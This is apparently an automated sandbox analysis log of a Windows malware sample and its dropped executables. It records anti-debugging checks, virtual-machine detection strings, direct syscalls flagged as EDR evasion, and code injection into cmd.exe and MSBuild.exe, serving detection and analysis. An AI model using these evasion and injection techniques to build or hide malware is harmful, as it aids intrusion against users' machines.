Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 1_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_6C7B261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 2_2_6C7B261E
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_00401120 GetSystemInfo,ExitProcess, 1_2_00401120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59759
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 35061
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 33546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 46089
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 35909
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 53012
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 42762
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 37957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 44100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 53130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 47778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 58713
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 51372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 36960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 31764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 54171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 37432
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 46986
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 54476
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 55005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 46201
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 58676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 42529
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 57709
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 49722
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 54003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 36205
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 41023
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 35972
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 33757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 48291
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 49249
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 45123
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 44683
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 51805
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 54334
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 35511
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 49472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 57176
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 39332
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 50567
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 32333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 50212
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 36658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 33896
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 45798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 40868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 47604
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 55594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 39496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 58378
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File opened: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File opened: C:\Users\user\AppData\Local\Temp\u5c4.2 Jump to behavior
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: Microsoft Hyper-V Server
Source: u5c4.3.exe, 00000005.00000003.2274120059.0000000000A57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056243816.00000240F83D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: Datacenter without Hyper-V Core
Source: cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: QEMU_HARDU
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: Standard without Hyper-V Full
Source: u5c4.0.exe, 00000001.00000002.2500095496.000000000436A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware<
Source: cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1!0
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: Enterprise without Hyper-V Core
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056243816.00000240F8365000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
Source: kO1P1YnLst.exe, 00000000.00000002.1986096149.0000000004311000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2500095496.0000000004395000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0/
Source: cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1
Source: cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.0
Source: u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: VMWARE_VIRTUAL
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056243816.00000240F83D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Virtual disk
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "Caption": "VMware Virtual disk",
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056243816.00000240F83D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MSFT_PhysicalDisk{1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\SPACES_PhysicalDisk.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{fadc7a83-6534-864a-66c8-a75a642cb79f}"6000C2942FCE4D06663969F532E45D1AVMware Virtual diskVMwareVirtual disk6000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0k
Source: MSBuild.exe, 0000000E.00000002.2971140255.000000000107D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: 6without Hyper-V for Windows Essential Server Solutions
Source: cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: noreply@vmware.com0
Source: u5c4.0.exe, 00000001.00000002.2500095496.000000000436A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: Standard without Hyper-V Core
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: Datacenter without Hyper-V Full
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: Enterprise without Hyper-V Full
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00409A73
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00EFD15B VirtualProtect ?,-00000001,00000104,?,?,?,00000000 2_2_00EFD15B
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00416240
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h] 0_2_004139E7
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_042554B3 push dword ptr fs:[00000030h] 0_2_042554B3
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BE0D90 mov eax, dword ptr fs:[00000030h] 0_2_05BE0D90
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BF3C4E mov eax, dword ptr fs:[00000030h] 0_2_05BF3C4E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BE092B mov eax, dword ptr fs:[00000030h] 0_2_05BE092B
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_00415DC0 mov eax, dword ptr fs:[00000030h] 1_2_00415DC0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_00420AEA GetProcessHeap, 0_2_00420AEA
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00409A73
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_00409C06 SetUnhandledExceptionFilter, 0_2_00409C06
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00409EBE
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041073B
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BE9CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_05BE9CDA
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BE9E6D SetUnhandledExceptionFilter, 0_2_05BE9E6D
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BF09A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_05BF09A2
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BEA125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_05BEA125
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_00419DC7 SetUnhandledExceptionFilter, 1_2_00419DC7
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00417B4E
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_004173DD
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC7AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6BC7AC62
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00EFC1FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00EFC1FD
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00F06678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00F06678
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_6C892782 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_6C892782
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_6C8990E9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6C8990E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe NtQuerySystemInformation: Direct from: 0xDF5BE4
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe NtSetInformationThread: Direct from: 0x6CD8617C
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe NtSetInformationThread: Direct from: 0x6C7A617C Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write
Searches for specific processes (likely to inject)
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 1_2_00415D00
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A791000 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: B03008 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A791000
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 637008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Process created: C:\Users\user\AppData\Local\Temp\u5c4.0.exe "C:\Users\user\AppData\Local\Temp\u5c4.0.exe" Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Process created: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe "C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe" Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Process created: C:\Users\user\AppData\Local\Temp\u5c4.3.exe "C:\Users\user\AppData\Local\Temp\u5c4.3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe "C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe"
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BCC4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 1_2_6BCC4760
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_6C7A3470 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck, 2_2_6C7A3470
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: TrayNotifyWndShell_TrayWnd
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: Shell_TrayWndtooltips_class32SVWU
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: Shell_TrayWndtooltips_class32S
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_00409D1B cpuid 0_2_00409D1B
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0042086B
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: EnumSystemLocalesW, 0_2_004170F1
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: EnumSystemLocalesW, 0_2_004201F6
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: EnumSystemLocalesW, 0_2_004201AB
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: EnumSystemLocalesW, 0_2_00420291
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_0042031E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: GetLocaleInfoW, 0_2_004174E4
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: GetLocaleInfoW, 0_2_0042056E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_00420697
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_0041FF33
